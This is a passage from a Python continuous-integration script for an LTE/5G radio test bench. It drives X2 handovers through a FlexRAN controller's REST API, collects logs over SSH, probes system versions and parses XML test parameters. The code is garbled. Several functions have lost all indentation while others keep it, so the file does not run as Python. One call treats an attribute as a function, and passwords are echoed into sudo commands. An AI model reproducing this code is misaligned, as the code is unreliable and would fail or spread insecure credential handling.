				HTML.htmlUEFailureMsg='<b>' + ueAction + ' Completed</b>\n' + HTML.htmlUEFailureMsg
				HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
			self.UELogFile = ''
		else:
			HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of UE'
HTML.desc='Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-OAI-UE'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of OAI-UE'
HTML.desc='Automatic Termination of OAI-UE'
self.ShowTestID()
self.TerminateOAIUE()
if (RAN.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of eNB'
HTML.desc='Automatic Termination of eNB'
self.ShowTestID()
RAN.eNB_instance=0
RAN.TerminateeNB()
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
self.testCase_id = 'AUTO-KILL-flexran-ctl'
HTML.testCase_id=self.testCase_id
self.desc = 'Automatic Termination of FlexRan CTL'
HTML.desc='Automatic Termination of FlexRan CTL'
self.ShowTestID()
self.TerminateFlexranCtrl()
RAN.prematureExit=True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
HTML.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', CONST.ALL_PROCESSES_OK)
	def X2_Status(self, idx, fileName):
		"""Snapshot the FlexRAN controller stats and record eNB/UE topology.

		Fetches /stats from the controller into fileName, extracts eNB ids
		and connected-UE RNTIs with jq into self.x2ENBBsIds[idx] /
		self.x2ENBConnectedUEs[idx] (idx 0 = pre-handover, 1 = post), and
		returns a multi-line text summary for the HTML report.
		"""
		cmd = "curl --silent http://" + EPC.IPAddress + ":9999/stats | jq '.' > " + fileName
		message = cmd + '\n'
		logging.debug(cmd)
		subprocess.run(cmd, shell=True)
		# the eNB count is only (re)computed on the first snapshot
		if idx == 0:
			cmd = "jq '.mac_stats | length' " + fileName
			strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
			self.x2NbENBs = int(strNbEnbs.strip())
		cnt = 0
		while cnt < self.x2NbENBs:
			cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
			bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
			self.x2ENBBsIds[idx].append(bs_id.strip())
			cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
			stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
			nbUEs = int(stNbUEs.strip())
			ueIdx = 0
			self.x2ENBConnectedUEs[idx].append([])
			while ueIdx < nbUEs:
				cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
				rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
				self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
				ueIdx += 1
			cnt += 1
		msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
		logging.debug(msg)
		message += msg + '\n'
		# build the human-readable topology summary
		cnt = 0
		while cnt < self.x2NbENBs:
			msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
			logging.debug(msg)
			message += msg + '\n'
			ueIdx = 0
			while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
				msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
				logging.debug(msg)
				message += msg + '\n'
				ueIdx += 1
			cnt += 1
		return message
def Perform_X2_Handover(self):
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl -XPOST http://" + EPC.IPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(10)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
cmd = "curl -XPOST http://" + EPC.IPAddress() + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(10)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', CONST.ALL_PROCESSES_OK)
def LogCollectBuild(self):
if (RAN.eNBIPAddress != '' and RAN.eNBUserName != '' and RAN.eNBPassword != ''):
IPAddress = RAN.eNBIPAddress
UserName = RAN.eNBUserName
Password = RAN.eNBPassword
SourceCodePath = RAN.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
SSH.open(IPAddress, UserName, Password)
SSH.command('cd ' + SourceCodePath, '\$', 5)
SSH.command('cd cmake_targets', '\$', 5)
SSH.command('rm -f build.log.zip', '\$', 5)
SSH.command('zip build.log.zip build_log_*/*', '\$', 60)
SSH.close()
def LogCollectPing(self):
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
SSH.command('rm -f ping.log.zip', '\$', 5)
SSH.command('zip ping.log.zip ping*.log', '\$', 60)
SSH.command('rm ping*.log', '\$', 5)
SSH.close()
def LogCollectIperf(self):
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
SSH.command('cd scripts', '\$', 5)
SSH.command('rm -f iperf.log.zip', '\$', 5)
SSH.command('zip iperf.log.zip iperf*.log', '\$', 60)
SSH.command('rm iperf*.log', '\$', 5)
SSH.close()
def LogCollectOAIUE(self):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath, '\$', 5)
SSH.command('cd cmake_targets', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
SSH.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
SSH.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
SSH.close()
	def RetrieveSystemVersion(self, machine):
		"""Collect OS / kernel / UHD / USRP / CPU information from *machine*
		('eNB' or 'UE') over SSH and store it into the HTML report arrays
		(index 0 for eNB, 1 for UE).

		Returns 0 when canned placeholder values are used (address 'none'),
		-1 when the requested machine has no credentials, None otherwise.
		"""
		# Placeholder path: with 'none' addresses the pipeline runs without
		# real hardware, so fill in fixed reference values and stop.
		if RAN.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
			HTML.OsVersion[0]='Ubuntu 16.04.5 LTS'
			HTML.KernelVersion[0]='4.15.0-45-generic'
			HTML.UhdVersion[0]='3.13.0.1-0'
			HTML.UsrpBoard[0]='B210'
			HTML.CpuNb[0]='4'
			HTML.CpuModel[0]='Intel(R) Core(TM) i5-6200U'
			HTML.CpuMHz[0]='2399.996 MHz'
			return 0
		if machine == 'eNB':
			if RAN.eNBIPAddress != '' and RAN.eNBUserName != '' and RAN.eNBPassword != '':
				IPAddress = RAN.eNBIPAddress
				UserName = RAN.eNBUserName
				Password = RAN.eNBPassword
				idx = 0
			else:
				return -1
		# NOTE(review): if machine is neither 'eNB' nor 'UE', IPAddress/idx are
		# never bound and SSH.open below raises NameError — confirm callers
		# only ever pass these two values.
		if machine == 'UE':
			if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
				IPAddress = self.UEIPAddress
				UserName = self.UEUserName
				Password = self.UEPassword
				idx = 1
			else:
				return -1
		SSH.open(IPAddress, UserName, Password)
		# OS version: try lsb_release first, fall back to hostnamectl.
		SSH.command('lsb_release -a', '\$', 5)
		result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', SSH.getBefore())
		if result is not None:
			OsVersion = result.group('os_type')
			logging.debug('OS is: ' + OsVersion)
			HTML.OsVersion[idx]=OsVersion
		else:
			SSH.command('hostnamectl', '\$', 5)
			result = re.search('Operating System: (?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', SSH.getBefore())
			if result is not None:
				OsVersion = result.group('os_type')
				# hostnamectl on CentOS 7 hides the minor release; refine it
				# from /etc/redhat-release.
				if OsVersion == 'CentOS Linux 7 ':
					SSH.command('cat /etc/redhat-release', '\$', 5)
					result = re.search('CentOS Linux release (?P<os_version>[0-9\.]+)', SSH.getBefore())
					if result is not None:
						OsVersion = OsVersion.replace('7 ', result.group('os_version'))
				logging.debug('OS is: ' + OsVersion)
				HTML.OsVersion[idx]=OsVersion
		SSH.command('uname -r', '\$', 5)
		result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', SSH.getBefore())
		if result is not None:
			KernelVersion = result.group('kernel_version')
			logging.debug('Kernel Version is: ' + KernelVersion)
			HTML.KernelVersion[idx]=KernelVersion
		# UHD version: dpkg on Debian/Ubuntu, otherwise uhd_config_info.
		SSH.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
		result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', SSH.getBefore())
		if result is not None:
			UhdVersion = result.group('uhd_version')
			logging.debug('UHD Version is: ' + UhdVersion)
			HTML.UhdVersion[idx]=UhdVersion
		else:
			SSH.command('uhd_config_info --version', '\$', 5)
			result = re.search('UHD (?P<uhd_version>[a-zA-Z0-9\.\-]+)', SSH.getBefore())
			if result is not None:
				UhdVersion = result.group('uhd_version')
				logging.debug('UHD Version is: ' + UhdVersion)
				HTML.UhdVersion[idx]=UhdVersion
		# Enumerate attached USRP boards into a comma-separated list.
		SSH.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 60)
		usrp_boards = re.findall('product: ([0-9A-Za-z]+)\\\\r\\\\n', SSH.getBefore())
		count = 0
		for board in usrp_boards:
			if count == 0:
				UsrpBoard = board
			else:
				UsrpBoard += ',' + board
			count += 1
		if count > 0:
			logging.debug('USRP Board(s) : ' + UsrpBoard)
			HTML.UsrpBoard[idx]=UsrpBoard
		SSH.command('lscpu', '\$', 5)
		result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', SSH.getBefore())
		if result is not None:
			CpuNb = result.group('nb_cpus')
			logging.debug('nb_cpus: ' + CpuNb)
			HTML.CpuNb[idx]=CpuNb
			CpuModel = result.group('model')
			logging.debug('model: ' + CpuModel)
			HTML.CpuModel[idx]=CpuModel
			CpuMHz = result.group('cpu_mhz') + ' MHz'
			logging.debug('cpu_mhz: ' + CpuMHz)
			HTML.CpuMHz[idx]=CpuMHz
		SSH.close()
def ShowTestID(self):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1mTest ID:' + self.testCase_id + '\u001B[0m')
logging.debug('\u001B[1m' + self.desc + '\u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
#-----------------------------------------------------------
# General Functions
#-----------------------------------------------------------
def CheckClassValidity(xml_class_list,action,id):
	"""Return True when *action* is a registered test-case class.

	Logs an error (pointing at xml_class_list.yml) and returns False
	when test-case *id* uses an unknown class name.
	"""
	if action not in xml_class_list:
		logging.debug('ERROR: test-case ' + id + ' has unlisted class ' + action + ' ##CHECK xml_class_list.yml')
		return False
	# Membership test already answers the question: return it directly
	# instead of routing through a temporary flag.
	return True
#assigning parameters to object instance attributes (even if the attributes do not exist !!)
def AssignParams(params_dict):
	"""Copy every (key, value) pair from *params_dict* onto each of the
	global management objects, creating attributes that do not yet exist."""
	targets = (CiTestObj, RAN, HTML, ldpc)
	for key, value in params_dict.items():
		for target in targets:
			setattr(target, key, value)
def GetParametersFromXML(action):
	"""Populate the per-action attributes of the global management objects
	(RAN, CiTestObj, ldpc) from the current XML <testCase> element.

	Relies on the module-level loop variable ``test`` holding the XML node
	currently being executed.  Missing optional fields fall back to the
	defaults set below.
	"""
	if action == 'Build_eNB':
		RAN.Build_eNB_args=test.findtext('Build_eNB_args')
		forced_workspace_cleanup = test.findtext('forced_workspace_cleanup')
		if (forced_workspace_cleanup is None):
			RAN.Build_eNB_forced_workspace_cleanup=False
		else:
			if re.match('true', forced_workspace_cleanup, re.IGNORECASE):
				RAN.Build_eNB_forced_workspace_cleanup=True
			else:
				RAN.Build_eNB_forced_workspace_cleanup=False
		eNB_instance=test.findtext('eNB_instance')
		if (eNB_instance is None):
			RAN.eNB_instance=0
		else:
			RAN.eNB_instance=int(eNB_instance)
		RAN.eNB_serverId=test.findtext('eNB_serverId')
		if (RAN.eNB_serverId is None):
			RAN.eNB_serverId='0'
		xmlBgBuildField = test.findtext('backgroundBuild')
		if (xmlBgBuildField is None):
			RAN.backgroundBuild=False
		else:
			if re.match('true', xmlBgBuildField, re.IGNORECASE):
				RAN.backgroundBuild=True
			else:
				RAN.backgroundBuild=False
	elif action == 'WaitEndBuild_eNB':
		RAN.Build_eNB_args=test.findtext('Build_eNB_args')
		eNB_instance=test.findtext('eNB_instance')
		if (eNB_instance is None):
			RAN.eNB_instance=0
		else:
			RAN.eNB_instance=int(eNB_instance)
		RAN.eNB_serverId=test.findtext('eNB_serverId')
		if (RAN.eNB_serverId is None):
			RAN.eNB_serverId='0'
	elif action == 'Initialize_eNB':
		RAN.Initialize_eNB_args=test.findtext('Initialize_eNB_args')
		eNB_instance=test.findtext('eNB_instance')
		if (eNB_instance is None):
			RAN.eNB_instance=0
		else:
			RAN.eNB_instance=int(eNB_instance)
		RAN.eNB_serverId=test.findtext('eNB_serverId')
		if (RAN.eNB_serverId is None):
			RAN.eNB_serverId='0'
		# local variable air_interface: maps 'nr'/'lte' to the matching
		# softmodem executable, anything else (or 'ocp') to ocp-enb.
		air_interface = test.findtext('air_interface')
		if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
			RAN.air_interface[RAN.eNB_instance] = 'lte-softmodem'
		elif (air_interface.lower() in ['nr','lte']):
			RAN.air_interface[RAN.eNB_instance] = air_interface.lower() +'-softmodem'
		else :
			RAN.air_interface[RAN.eNB_instance] = 'ocp-enb'
	elif action == 'Terminate_eNB':
		eNB_instance=test.findtext('eNB_instance')
		if (eNB_instance is None):
			RAN.eNB_instance=0
		else:
			RAN.eNB_instance=int(eNB_instance)
		RAN.eNB_serverId=test.findtext('eNB_serverId')
		if (RAN.eNB_serverId is None):
			RAN.eNB_serverId='0'
		# local variable air_interface (same mapping as Initialize_eNB)
		air_interface = test.findtext('air_interface')
		if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
			RAN.air_interface[RAN.eNB_instance] = 'lte-softmodem'
		elif (air_interface.lower() in ['nr','lte']):
			RAN.air_interface[RAN.eNB_instance] = air_interface.lower() +'-softmodem'
		else :
			RAN.air_interface[RAN.eNB_instance] = 'ocp-enb'
	elif action == 'Attach_UE':
		nbMaxUEtoAttach = test.findtext('nbMaxUEtoAttach')
		if (nbMaxUEtoAttach is None):
			CiTestObj.nbMaxUEtoAttach = -1
		else:
			CiTestObj.nbMaxUEtoAttach = int(nbMaxUEtoAttach)
	elif action == 'CheckStatusUE':
		expectedNBUE = test.findtext('expectedNbOfConnectedUEs')
		if (expectedNBUE is None):
			CiTestObj.expectedNbOfConnectedUEs = -1
		else:
			CiTestObj.expectedNbOfConnectedUEs = int(expectedNBUE)
	elif action == 'Build_OAI_UE':
		CiTestObj.Build_OAI_UE_args = test.findtext('Build_OAI_UE_args')
		CiTestObj.clean_repository = test.findtext('clean_repository')
		# Anything but the literal string 'false' (including absent) cleans.
		if (CiTestObj.clean_repository == 'false'):
			CiTestObj.clean_repository = False
		else:
			CiTestObj.clean_repository = True
	elif action == 'Initialize_OAI_UE':
		CiTestObj.Initialize_OAI_UE_args = test.findtext('Initialize_OAI_UE_args')
		UE_instance = test.findtext('UE_instance')
		if (UE_instance is None):
			CiTestObj.UE_instance = 0
		else:
			# NOTE(review): kept as a *string* here while Terminate_OAI_UE
			# converts to int — confirm which type downstream expects.
			CiTestObj.UE_instance = UE_instance
		# local variable air_interface; OCP UE is not supported
		air_interface = test.findtext('air_interface')
		if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
			CiTestObj.air_interface = 'lte-uesoftmodem'
		elif (air_interface.lower() in ['nr','lte']):
			CiTestObj.air_interface = air_interface.lower() +'-uesoftmodem'
		else :
			#CiTestObj.air_interface = 'ocp-enb'
			logging.error('OCP UE -- NOT SUPPORTED')
	elif action == 'Terminate_OAI_UE':
		UE_instance=test.findtext('UE_instance')
		if (UE_instance is None):
			CiTestObj.UE_instance = '0'
		else:
			CiTestObj.UE_instance = int(UE_instance)
		# local variable air_interface; OCP UE is not supported
		air_interface = test.findtext('air_interface')
		if (air_interface is None) or (air_interface.lower() not in ['nr','lte','ocp']):
			CiTestObj.air_interface = 'lte-uesoftmodem'
		elif (air_interface.lower() in ['nr','lte']):
			CiTestObj.air_interface = air_interface.lower() +'-uesoftmodem'
		else :
			#CiTestObj.air_interface = 'ocp-enb'
			logging.error('OCP UE -- NOT SUPPORTED')
	elif (action == 'Ping') or (action == 'Ping_CatM_module'):
		CiTestObj.ping_args = test.findtext('ping_args')
		CiTestObj.ping_packetloss_threshold = test.findtext('ping_packetloss_threshold')
	elif action == 'Iperf':
		CiTestObj.iperf_args = test.findtext('iperf_args')
		CiTestObj.iperf_packetloss_threshold = test.findtext('iperf_packetloss_threshold')
		CiTestObj.iperf_profile = test.findtext('iperf_profile')
		if (CiTestObj.iperf_profile is None):
			CiTestObj.iperf_profile = 'balanced'
		else:
			# Unknown profiles are logged and coerced back to 'balanced'.
			if CiTestObj.iperf_profile != 'balanced' and CiTestObj.iperf_profile != 'unbalanced' and CiTestObj.iperf_profile != 'single-ue':
				logging.debug('ERROR: test-case has wrong profile ' + CiTestObj.iperf_profile)
				CiTestObj.iperf_profile = 'balanced'
		CiTestObj.iperf_options = test.findtext('iperf_options')
		if (CiTestObj.iperf_options is None):
			CiTestObj.iperf_options = 'check'
		else:
			if CiTestObj.iperf_options != 'check' and CiTestObj.iperf_options != 'sink':
				logging.debug('ERROR: test-case has wrong option ' + CiTestObj.iperf_options)
				CiTestObj.iperf_options = 'check'
	elif action == 'IdleSleep':
		string_field = test.findtext('idle_sleep_time_in_sec')
		if (string_field is None):
			CiTestObj.idle_sleep_time = 5
		else:
			CiTestObj.idle_sleep_time = int(string_field)
	elif action == 'Perform_X2_Handover':
		string_field = test.findtext('x2_ho_options')
		if (string_field is None):
			CiTestObj.x2_ho_options = 'network'
		else:
			# 'network' is currently the only supported handover option.
			if string_field != 'network':
				logging.error('ERROR: test-case has wrong option ' + string_field)
				CiTestObj.x2_ho_options = 'network'
			else:
				CiTestObj.x2_ho_options = string_field
	elif action == 'Build_PhySim':
		ldpc.buildargs = test.findtext('physim_build_args')
		forced_workspace_cleanup = test.findtext('forced_workspace_cleanup')
		if (forced_workspace_cleanup is None):
			ldpc.forced_workspace_cleanup=False
		else:
			if re.match('true', forced_workspace_cleanup, re.IGNORECASE):
				ldpc.forced_workspace_cleanup=True
			else:
				ldpc.forced_workspace_cleanup=False
	else: # ie action == 'Run_PhySim':
		ldpc.runargs = test.findtext('physim_run_args')
#check if given test is in list
#it is in list if one of the strings in 'list' is at the beginning of 'test'
def test_in_list(test, list):
for check in list:
check=check.replace('+','')
if (test.startswith(check)):
return True
return False
def receive_signal(signum, frame):
	"""Signal handler (registered for SIGUSR1): abort the run with exit code 1."""
	sys.exit(1)
#-----------------------------------------------------------
# MAIN PART
#-----------------------------------------------------------
# Load the list of valid test-case classes from yaml; look in the current
# directory first, then in ci-scripts/ (when run from the repository root).
import yaml
xml_class_list_file='xml_class_list.yml'
if (os.path.isfile(xml_class_list_file)):
	yaml_file=xml_class_list_file
elif (os.path.isfile('ci-scripts/'+xml_class_list_file)):
	yaml_file='ci-scripts/'+xml_class_list_file
else:
	logging.error("XML action list yaml file cannot be found")
	sys.exit("XML action list yaml file cannot be found")
with open(yaml_file,'r') as f:
	# The FullLoader parameter handles the conversion
	# from YAML scalar values to Python dictionary format
	xml_class_list = yaml.load(f,Loader=yaml.FullLoader)
# Instantiate the global management singletons used throughout the script
# and wire up their cross-references.
mode = ''
CiTestObj = OaiCiTest()
SSH = sshconnection.SSHConnection()
EPC = epc.EPCManagement()
RAN = ran.RANManagement()
HTML = html.HTMLManagement()
EPC.htmlObj=HTML
RAN.htmlObj=HTML
RAN.epcObj=EPC
ldpc=cls_physim.PhySim() #create an instance for LDPC test using GPU or CPU build
#-----------------------------------------------------------
# Parsing Command Line Arguments
#-----------------------------------------------------------
import args_parse
# ArgsParse fills the management objects in place and returns the run mode.
py_param_file_present, py_params, mode = args_parse.ArgsParse(sys.argv,CiTestObj,RAN,HTML,EPC,ldpc,HELP)
#-----------------------------------------------------------
# TEMPORARY params management
#-----------------------------------------------------------
#temporary solution for testing:
if py_param_file_present == True:
	AssignParams(py_params)
#for debug
#print(RAN.__dict__)
#print(CiTestObj.__dict__)
#print(HTML.__dict__)
#print(ldpc.__dict__)
#for debug
#-----------------------------------------------------------
# COTS UE instantiation
#-----------------------------------------------------------
#COTS_UE instantiation and ADB server init
#ue id and ue mode are retrieved from xml
COTS_UE=cls_cots_ue.CotsUe(CiTestObj.ADBIPAddress, CiTestObj.ADBUserName,CiTestObj.ADBPassword)
#-----------------------------------------------------------
# XML class (action) analysis
#-----------------------------------------------------------
# Top-level dispatch on the run mode passed on the command line: one-shot
# maintenance modes (Terminate*/LogCollect*/InitiateHtml/FinalizeHtml) and
# the main TesteNB/TestUE scenario runner.
cwd = os.getcwd()
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
	if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	RAN.eNB_serverId='0'
	RAN.eNB_instance=0
	RAN.eNBSourceCodePath='/tmp/'
	RAN.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
	if (CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == ''):
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	signal.signal(signal.SIGUSR1, receive_signal)
	CiTestObj.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
	if CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	signal.signal(signal.SIGUSR1, receive_signal)
	CiTestObj.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath== '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
	if (RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '') and (CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == ''):
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	CiTestObj.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
	if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or RAN.eNBSourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	RAN.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.Type == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	EPC.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	CiTestObj.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
	if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	CiTestObj.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
	if CiTestObj.UEIPAddress == '' or CiTestObj.UEUserName == '' or CiTestObj.UEPassword == '' or CiTestObj.UESourceCodePath == '':
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	CiTestObj.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
	if (CiTestObj.ADBIPAddress == '' or CiTestObj.ADBUserName == '' or CiTestObj.ADBPassword == ''):
		HELP.GenericHelp(CONST.Version)
		sys.exit('Insufficient Parameter')
	# Collect the tab metadata from every requested XML test file so the
	# report header can be generated up-front.
	count = 0
	foundCount = 0
	while (count < HTML.nbTestXMLfiles):
		#xml_test_file = cwd + "/" + CiTestObj.testXMLfiles[count]
		xml_test_file = sys.path[0] + "/" + CiTestObj.testXMLfiles[count]
		if (os.path.isfile(xml_test_file)):
			try:
				xmlTree = ET.parse(xml_test_file)
			except:
				print("Error while parsing file: " + xml_test_file)
			xmlRoot = xmlTree.getroot()
			HTML.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
			HTML.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='test-tab-' + str(count)))
			HTML.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
			foundCount += 1
		count += 1
	if foundCount != HTML.nbTestXMLfiles:
		HTML.nbTestXMLfiles=foundCount
	if (CiTestObj.ADBIPAddress != 'none'):
		terminate_ue_flag = False
		CiTestObj.GetAllUEDevices(terminate_ue_flag)
		CiTestObj.GetAllCatMDevices(terminate_ue_flag)
		HTML.SethtmlUEConnected(len(CiTestObj.UEDevices) + len(CiTestObj.CatMDevices))
		HTML.htmlNb_Smartphones=len(CiTestObj.UEDevices)
